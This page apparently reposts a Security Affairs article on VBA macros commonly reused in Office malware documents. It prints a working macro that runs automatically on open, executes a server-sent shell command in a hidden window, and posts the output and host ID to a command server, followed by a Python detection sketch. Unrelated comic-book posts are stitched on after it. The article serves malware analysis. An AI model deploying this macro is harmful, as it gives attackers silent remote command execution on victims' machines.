Dim serverUrl As String ' Auto generate at startup Sub Workbook_Open() Main End Sub Sub AutoOpen() Main End Sub Private Sub Main() Dim msg As String serverUrl = "<<>>" msg = "<<>>" On Error GoTo byebye msg = PlayCmd(msg) SendResponse msg On Error GoTo 0 byebye: End Sub 'Sen data using http post' 'Note: 'WinHttpRequestOption_SslErrorIgnoreFlags, // 4 ' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx' Private Function HttpPostData(URL As String, data As String) 'data must have form "var1=value1&var2=value2&var3=value3"' Dim objHTTP As Object Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert objHTTP.Open "POST", URL, False objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded" objHTTP.SetTimeouts 2000, 2000, 2000, 2000 objHTTP.send (data) HttpPostData = objHTTP.responseText End Function ' Returns target ID' Private Function GetId() As String Dim myInfo As String Dim myID As String myID = Environ("COMPUTERNAME") & " " & Environ("OS") GetId = myID End Function 'To send response for command' Private Function SendResponse(cmdOutput) Dim data As String Dim response As String data = "id=" & GetId & "&cmdOutput=" & cmdOutput SendResponse = HttpPostData(serverUrl, data) End Function ' Play and return output any command line Private Function PlayCmd(sCmd As String) As String 'Run a shell command, returning the output as a string' ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility... 
' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows Dim instruction As String instruction = "cmd.exe /c " & sCmd & " | clip" CreateObject("WScript.Shell").Run instruction, 0, True ' Read the clipboard text using htmlfile object PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text") End Function

You will probably never see this code exactly as shown here, but you will likely find many similarities with the macros you analyse in your next MalDoc investigations. Just remember that, on the one hand, attackers love to re-use code, but on the other hand, they really like to customize it. In your next VBA macro analysis, keep these stereotypes in mind to speed up your work.
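For analysts, the recurring patterns discussed in this post can be turned into a quick triage check. The following is a minimal sketch, not part of the original article: the indicator list, the labels, and the function name `triage_macro` are all assumptions chosen for illustration, and it expects the macro source to have already been extracted as plain text with a tool of your choice.

```python
import re
from typing import List

# Hypothetical indicator patterns, loosely based on the building blocks
# described in this post. This is an illustrative list, not a complete one.
INDICATORS = {
    "auto-exec entry point": r"\b(AutoOpen|Auto_Open|Workbook_Open|Document_Open)\b",
    "HTTP client object": r"WinHttp\.WinHttpRequest|MSXML2\.XMLHTTP|Net\.WebClient",
    "shell execution": r"WScript\.Shell|\bShell\s*\(|cmd\.exe|powershell",
    "clipboard via htmlfile": r"CreateObject\(\s*\"htmlfile\"\s*\)",
    "file download": r"DownloadFile|URLDownloadToFile",
}


def triage_macro(source: str) -> List[str]:
    """Return the labels of every indicator found in the macro source text."""
    return [
        label
        for label, pattern in INDICATORS.items()
        if re.search(pattern, source, re.IGNORECASE)
    ]
```

A match is only a hint that a macro deserves a closer look. Customized or obfuscated samples will evade simple string matching like this, so treat the result as a way to prioritize manual analysis and not as a verdict.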

The original post is available on Marco Ramilli’s blog:

Frequent VBA Macros used in Office Malware

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I hold an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division), where I did intensive research on malware evasion techniques and penetration testing of electronic voting systems.

I have experience in security testing, having performed penetration tests on several US electronic voting systems. I was also in charge of testing the uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies, where I was introduced to the Intelligence Ecosystem. I decided to broaden my cyber security experience by diving into SCADA security issues with some of the biggest industrial conglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing one of the most amazing cyber security defence centers I’ve ever experienced! Now I technically lead Yoroi, defending our customers and strongly believing in: Defence Belongs To Humans


Pierluigi Paganini

(SecurityAffairs – VBA macros, Office malware)

The post Frequent VBA Macros used in Office Malware appeared first on Security Affairs.


Original post from Security Affairs. Author: Pierluigi Paganini. The malware expert Marco Ramilli collected a small set of VBA macros widely re-used to “weaponize” MalDocs (malware documents) in cyber attacks.

0 notes

Link

Before it was picked up by Dynamite, I edited the first four issues of this Kickstarter comic. Highly recommended!

0 notes

Photo

CHASTITY #1 PAGE3 PANEL4 LINEWORK Published by Dynamite (w) Leah Williams (a) me (c) Bryan Valenza (l) Carlos M. Mangual https://www.dynamite.com/htmlfiles/onsale.html?fbclid=IwAR3tl1tDAnMuE29i2auwOYva9a0bXNguJfjJ3EyyQcdEM5n9qdzntcYcMsc #DareToBeDynamite! #DareToBeYOU! #womenincomics #womencharactersincomics #vampires #workincomics #makingcomics https://www.instagram.com/p/B2cUF8LooBA/?igshid=e3boc70sd80u

#1#daretobedynamite#daretobeyou#womenincomics#womencharactersincomics#vampires#workincomics#makingcomics

0 notes

Text



"THE ENIGMATIC SOLDIER KNOWN AS CAPTAIN VICTORY LEADS AN ELITE GROUP OF INTERGALACTIC RANGERS..."

PIC(S) INFO: Resolution at 1280x1976 -- Mega spotlight on cover art to "Kirby: Genesis -- Captain Victory" Vol. 1 #1. October, 2011. Dynamite Entertainment. Artwork by Alex Ross.

PICS #2 & 3: Resolution at 600×900 -- Textless & published cover art from the Dynamite official website.

OVERVIEW: "The enigmatic soldier known as Captain Victory leads an elite group of intergalactic rangers through the mysterious and deadly cosmos, fighting against forces set on the destruction of life, itself! But who is this man, and what does he want? This special introductory issue written by Sterling Gates and drawn by Wagner Reis starts with a bang, as the deadliest battle Captain Victory and his men have ever fought begins!"

-- DYNAMITE ENTERTAINMENT, c. fall 2011

Sources: www.dynamite.com/htmlfiles/viewProduct.html?PRO=C725130179654 & eBay.

#Kirby: Genesis#Kirby Genesis#Captain Victory#Dynamite Entertainment#Alex Ross Art#Sci-fi fantasy#Sci-fi Art#Sci-fi#Gouache Style#Gouache#Jack King Kirby#Jack Kirby#Captain Victory and the Galactic Rangers#Galactic Rangers#The Galactic Rangers#Kirby: Genesis -- Captain Victory Vol. 1#Dynamic Forces#Cover Art#Illustration#Kirby: Genesis Vol. 1#Kirby Genesis Vol. 1#Captain Victory Vol. 1#Dynamite Comics#Science fantasy#Space fantasy#Science fiction#Dynamite#Kirbyverse#Alex Ross#Sci-fi Fri

0 notes